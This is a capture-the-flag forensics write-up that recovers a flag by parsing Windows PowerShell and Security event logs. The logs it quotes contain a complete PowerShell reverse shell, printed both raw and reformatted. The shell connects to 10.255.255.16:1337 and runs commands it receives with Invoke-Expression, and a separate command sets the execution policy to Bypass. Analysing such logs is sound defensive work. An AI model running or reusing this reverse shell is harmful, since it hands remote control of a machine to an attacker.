Weird Shell
Category: forensics
Difficulty : ⭐
States
Another user has similar behavior to Windows Gazette (intro category). But this time, to find what was sent to the attacker, you may need more logs.
SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
SHA256(Security.evtx) = 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
Solve
We check the integrity of the log files :
1
2
3
4
5
6
7
8
|
sha256sum Microsoft-Windows-PowerShell4Operational.evtx | grep 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc Microsoft-Windows-PowerShell4Operational.evtx
sha256sum Security.evtx | grep 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689 Security.evtx
|
We will use the evtx tool to parse the .evtx :
1
2
3
|
./evtx_dump -o json Microsoft-Windows-PowerShell4Operational.evtx > powershell.json
./evtx_dump -o json Security.evtx > security.json
|
We are looking for a powershell script :
1
2
3
4
5
|
cat powershell.json| grep -i ".ps1"
"ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'"
"Path": "D:\\PAYLOAD.PS1",
"Path": "D:\\PAYLOAD.PS1",
"Path": "D:\\PAYLOAD.PS1",
|
At record 1467, the PAYLOAD.PS1 script is executed :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
Record 1467
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"EventData": {
"MessageNumber": 1,
"MessageTotal": 1,
"Path": "",
"ScriptBlockId": "fab1cf7c-71d9-40fc-8f4d-6440a06f856f",
"ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'"
},
"System": {
"Channel": "Microsoft-Windows-PowerShell/Operational",
"Computer": "DESKTOP-AL3DV8F.fcsc.fr",
"Correlation": {
"#attributes": {
"ActivityID": "F3D5BB62-656E-0001-1F13-D6F36E65D901"
}
},
"EventID": 4104,
"EventRecordID": 1467,
"Execution": {
"#attributes": {
"ProcessID": 3788,
"ThreadID": 748
}
},
|
At record 1468, we notice that powershell from the PAYLOAD.PS1 script is executed :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
Record 1468
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"EventData": {
"MessageNumber": 1,
"MessageTotal": 1,
"Path": "D:\\PAYLOAD.PS1",
"ScriptBlockId": "2354b750-2422-42a3-b8c2-4fd7fd36dfe7",
"ScriptBlockText": "do {\n Start-Sleep -Seconds 1\n try{\n $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)\n } catch {}\n} until ($TCPClient.Connected)\n$NetworkStream = $TCPClient.GetStream()\n$StreamWriter = New-Object IO.StreamWriter($NetworkStream)\nfunction WriteToStream ($String) {\n [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}\n $StreamWriter.Write($String + 'SHELL> ')\n $StreamWriter.Flush()\n}\nWriteToStream \"FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name).ToString()))))).Replace('-', '').ToLower())}`n\"\nwhile(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {\n $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)\n $Output = try {\n Invoke-Expression $Command 2>&1 | Out-String\n } catch {\n $_ | Out-String\n }\n WriteToStream ($Output)\n}\n$StreamWriter.Close()\n"
},
"System": {
"Channel": "Microsoft-Windows-PowerShell/Operational",
"Computer": "DESKTOP-AL3DV8F.fcsc.fr",
"Correlation": {
"#attributes": {
"ActivityID": "F3D5BB62-656E-0000-5F11-D6F36E65D901"
}
},
"EventID": 4104,
"EventRecordID": 1468,
"Execution": {
"#attributes": {
"ProcessID": 3788,
"ThreadID": 748
}
},
|
We reformat the powershell for more readability :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
do {
Start-Sleep -Seconds 1
try {
$TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
$StreamWriter.Write($String + 'SHELL> ')
$StreamWriter.Flush()
}
WriteToStream "FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name).ToString()))))).Replace('-', '').ToLower())}`n"
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {
Invoke-Expression $Command 2>&1 | Out-String
} catch {
$_ | Out-String
}
WriteToStream ($Output)
}
$StreamWriter.Close()
|
The code is a PowerShell script that establishes a TCP connection with IP address 10.255.255.16 on port 1337. It then sends a string in the format FCSC{hash} which is a SHA256 hash value calculated on the combination of the PowerShell process identifier (PID) and the current username. This hash is sent across the TCP connection.
At the record 1468 and 1469 of the powershell logs, we can have the PID : 3788
1
2
3
4
5
6
7
8
|
"EventID": 4104,
"EventRecordID": 1467,
"Execution": {
"#attributes": {
"ProcessID": 3788,
"ThreadID": 748
}
}
|
At record 59778 in the Security logs, we can see the current user when PAYLOAD.PS1 was executed. Pay attention to the name of the computer, if you look closely at the log you understand that the machine is in a domain, the name of the machine is replaced by the NETBIOS name of the domain : FCSC\cmaltese
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
Record 59778
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"EventData": {
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"-Command\" \"if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'\"",
"MandatoryLabel": "S-1-16-8192",
"NewProcessId": "0xecc",
"NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"ParentProcessName": "C:\\Windows\\explorer.exe",
"ProcessId": "0x1544",
"SubjectDomainName": "FCSC",
"SubjectLogonId": "0x647ad",
"SubjectUserName": "cmaltese",
"SubjectUserSid": "S-1-5-21-3727796838-1318123174-2233927406-1107",
"TargetDomainName": "-",
"TargetLogonId": "0x0",
"TargetUserName": "-",
"TargetUserSid": "S-1-0-0",
"TokenElevationType": "%%1936"
}
|
We modify the piece of code that interests us and we display it :
1
|
Write-Output "FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(("3788"+"FCSC\cmaltese").ToString()))))).Replace('-', '').ToLower())}`n"
|
Flag : FCSC{21311ed8321926a27f6a6c407fdbe7dc308535caad861c004b382402b556bbfa}
